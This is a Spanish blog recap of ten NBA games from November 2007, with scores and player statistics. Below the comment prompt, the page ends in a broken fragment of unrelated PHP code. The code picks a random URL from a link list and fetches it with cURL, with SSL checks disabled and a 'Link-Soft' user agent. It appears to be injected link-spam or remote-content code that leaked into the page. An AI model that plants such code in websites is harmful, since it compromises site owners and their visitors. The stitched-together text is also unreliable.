La crónica (24/11/2007)

25 de November de 2007 por Drheam

 Hasta diez partidos se han disputado esta madrugada en la NBA. La noche dió para todo, derrota de Dallas, victoria ajustadísima de Boston ante Charlotte, victoria de Houston después de 6 derrotas consecutivas, King James empeñado en ganar, vuelven Paul y Tyson a New Orleans, Dallas segunda derrota, los Bulls y los Knicks demuestran porqué están donde están, los Raptors sin Gabo vuelven a perder, a los Hawks les tocó la de cal, NBArro-Gay-Pau son la esperanza de Memphis, los Heat no arrancan pero mejoran, regresan los “creyentes”….

 

Raptors 108 – Cavaliers 111

Lebron parece dispuesto a dar guerra esta temporada. Su equipo, salvo Ilgauskas, no está muy por la labor a seguirle. Pero Lebron en muchos casos se sirve el solo para ganar partidos, como ha ocurrido esta noche. Actuación estelar de King James con un triple doble, 37 puntos, 12 rebotes y 12 asistencias. Su escudero esta noche fué Ilgauskas, 16 puntos y 15 rebotes. Por parte de Toronto, Mitchell continua buscando la fórmula que le dé victorias. De momento  no da con ella,  su equipo no sabe a que juega y los partidos parecen un desastre táctico. Se salva Bosh, con 41 puntos, 5 asistencias y 4 rebotes, secundado por Kapono, 17 puntos con 3 de seis en triples, para un total de 7 de 11 en tiros de campo, y el italiano Bargnani, 14 puntos y 5 rebotes con 5 de 9 en tiros de campo.

Hawks 94 – TimberWolves 87

Los Wolves siguen en su travesía por el desierto y acumulan una nueva derrota, ésta vez ante los irregulares Hawks que se apuntan otra victoria más a su casillero. Éstos últimos volvieron a dar síntomas de irregularidad, sobre todo en la primera parte, pero un enorme último cuarto (parcial de 30-12) acabó con las ilusiones de los jóvenes Wolves.
Por parte de los Hawks destacó Joe Johnson, 25 puntos y 5 asistencias, y la pareja de los Josh: Smith con 16 puntos, 8 rebotes y 5 asistencias y Childress con 14 puntos y 7 rebotes. Por parte de los lobitos destacar al de casi siempre, Al Jefferson, 23 puntos y 16 rebotes, ésta vez ayudado por un Marko Jaric, 20 puntos y 6 asistencias, que recordó al de su primer año. Se prevee un año muy duro para los aficionados en Minnesota.

Wizards 118 – Grizzlies 124

NBArro la volvió a liar…¿Por qué eres tan bueno, tío? Los 28 puntos (10-14 FG,5-8 3PT) y 4 asistencias de Juan Carlos, junto a los 27 puntos y 8 rebotes de Rudy Gay y los 21 puntos y 9 rebotes de Pau Gasol consiguieron derrotar, en un partido reñido, al equipo de la Capital Estadounidense dónde sobresalieron un enorme Jamison, 41 puntos y 11rebotes,  y Butler con 27 puntos, 7 rebotes, 6 asistencias y 5 robos. El partido estuvo igualado durante gran parte del encuentro, pero el buen hacer de Lowry permitió coger una ventaja cómoda para ganar el partido. Fue un partido de anotación alta donde ambos equipos tuvieron unos enormes porcentaje, sobre todo en cuanto a triples donde se rozó el 50% o incluso se superó como en el caso de los ositos.

Bulls 78 – Knicks 85

Chicago continua dormido en esta temporada. Todo el mundo esperaba unos Bulls con garra, intensidad, y juego rapido, pero estos chicos no tienen nada que ver con los de la temporada pasada. Deng no acaba de despertar y Wallace parece que ha entrado en un declive temprano.

Partido insulso, donde Chicago no ha rozado ni el 40% en tiros de campo. El mejor esta noche fué Nocióni, 23 puntos, 9 rebotes, con 7 de 15 en tiros de campo. Gordon no ha tenido la noche y ha necesitado 17 intentos para 4 canastas. En New York destacar a su pareja interior Zach-Curry ya que entre los dos se fueron a los 41 puntos, casi la mitad del equipo, y 13 rebotes. Mención para Marbury, que ha realizado un buen partido como base titular, 19 puntos, 6 rebotes y 4 asistencias.

Heat 99 – Magic 120

Wade vuelve al equipo, y los tanteos de Miami en los partidos suben como la espuma. Pero de momento Miami necesita algo más que la vuelta de Wade. Esta noche el escolta estrella de Miami hizo 32 puntos, 6 rebotes y 6 asistencias con 12 de 21 en tiros de campo. Shaq ayuda, 20 puntos y6 rebotes, y Davis también aporta su granito de arena, 23 puntos, 6 rebotes y 7 asistencias. Pero el banco es un autentico solar y sin la aportación de gente de refresco es complicado que este equipo tenga cotas altas esta temporada.

Orlando se ha encontrado esta temporada con un Turkoglu en una forma excelente. Si a eso le unimos a Lewis y a Howard, Orlando se convierte en un equipo complicado y con diferentes posibilidades en ataque. Esta noche han jugado bien los 3, Turkoglu, 27 puntos con 9 de 16 en tiros de campo, 19 puntos, 4 rebotes y 4 asistencias de Lewis, y 17 puntos y 13 rebotes de Dwight. Con eso a Orlando le ha sobrado para ganar a Miami.

Hornets 98 – Clippers 89

Vuelve la pareja Tyson-Paul y regresan las victorias. Paul 10 puntos y 11 asistencias, Tyson 12 puntos y 5 rebotes. Partido flojo de la pareja estrella, pero su presencia da alas al resto de compañeros, sobretodo en el caso del pequeño base que se ha convertido en el alma del equipo.

Esta noche han estado bien secundados por Pedja, West y Peterson. Porcentajes interesantes en el quipo del Missisipi, 80% en tiros libres, 53% en triples, y 46 % en tiros de dos.

Por parte de los Clippers, buen partido de Cuttino, 20 puntos, 3 rebotes y 3 asistencias, y buen partido bajo los aros de Thomas y Kaman, capturaron 12 rebotes cada uno. Además Kaman se fue hasta los 18 puntos, mientras que Thomas logró 13.

Celtics 96 – Bobcats 95

Casi salta la sorpresa en este partido, pero Allen estaba listo para este final apretado. Pintaba muy mal el partido para Boston, que ha sido superado por Charlotte en casi todo el partido. A falta de 4 segundos Boston perdía de 2 y el balón era de los de North Carolina, pero no supieron sacar de banda, el balón le llego a Allen y sobre la bocina triple que sentencio el partido. Hasta ese momento el partido de Allen había sido mediocre, pero esa pincelada de calidad es lo que queda en la retina. Fenomenal Pierce y Garnett en el tema anotador, ambos con 23 puntos.Y buena aportación desde el banco de Posey. Por parte de Charlotte, buen partido de Jason, con 25 puntos, 9 rebotes y 5 asistencias, 18 puntitos de Felton, y Okafor, 15 puntos y 9 rebotes.

Boston en este partido demuestra garra, espíritu ganador. A parte de tener excelentes jugadores, ha demostrado que el grupo funciona, y que saben sufrir.

Warriors 100 – Sixers 98

No fué el mejor jugador en términos globales del partido, pero un triple de Azubuike (alias Kelenna) enterró las esperanzas de Philadelphia. Faltaban 6 segundos para el final de la prorroga cuando tamaña hazaña sucedió. Ambos equipos parecieron empeñados en forzar la prorroga, ya que desde el minuto 46 al 48 sólo brillaron los fallos. El partido estuvo realmente igualado en todo momento, con diferencias no superiores a los 10 puntos, a pesar de las brillantes actuaciones de Monta Ellis (igualando con 31 su mejor anotación profesional y saliendo desde el banco), Baron Davis (éste no perdona; 22 puntos, 7 rebotes y 6 asistencias), Biedrins con un doble-doble, y Stephen “L.” Jackson con sus 18 puntos y su mala leche habitual. Esta victoria supone el quinto partido ganado de los 6 últimos partidos jugados, y parece que retoman q la vereda de los laureles. Por parte de los de Streets of Philadelphia destacar a los habituales André Miller, Igualada y sus acrobacias y un imberbe Louis Williams, que vá para figura de esto.

Nuggets 81 –  Rockets 109

Los Rockets rompen con esta victoria una racha de 6 partidos consecutivos perdiendo gracias a sus dos grandes estrellas, T-Mac con 35 puntos (21 al descanso) y el chino Ming con 22 puntos y 13 rebotes. El estrenador de estos, Rick Adelman, indicó nuevas tácticas ofensivas y preparó a sus jugadores para correr más y conseguir baskets más fáciles. Incluso llegaron a ganar por 31 puntos. Battier también hizo buen partido con 12 rebotes y Francis jugando media parte hizo 10 puntos y 4 rebotes.
Allen Iverson y Melo se quedaron en 18 y 17 puntos respectivamente, pero colectívamente no funcionaron ya que entre los dos hicieron solo una asistencia, y eso el equipo lo notó claramente. Camby se quedó en sólo 9 rebotes esta vez y Kenyon Martin se fastidió la rodilla derecha antes de acabar la mitad del partido y a estas horas aun no sabemos el alcance.

Mavericks 95 – Bucks 97

Un partido muy igualado con otro recital de Michael Reed que se erigió líder del partido gracias a sus 27 puntos y ultimos 5 tiros libres de su equipo. Estuvo muy bien secundado por el australiano Bogut con 16 puntos y 14 rebotes, mientras que Mo Williams añadio 19 tantos y 10 asistencias para seguir invictos en casa, 6-0.
Los Mavs consiguen su segunda derrota consecutiva por la gira del este teniendo en Howard a su máximo estandarte con 24 puntos 11 rebotes y 4 asistencias. Nowitzki no estuvo tan fino en la faceta reboteadora 3, algo mejor en la anotadora con 20 puntos. Desde el banco Terry cumplió con 21 puntos (17 en los ultimos 5 minutos del partido) y un alto porcentaje de tiros de 3 (6/10). Bass tambien contribuyó con 12 puntos. El resto del equipo aportó poca cosa, incluyendo a Harris, original de Milwaukee y jugador de la universidad de Wisconsin, el cual proporciono 46 entradas para su familia y amigos pero el se quedó en 6 puntos y 9 asistencias.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>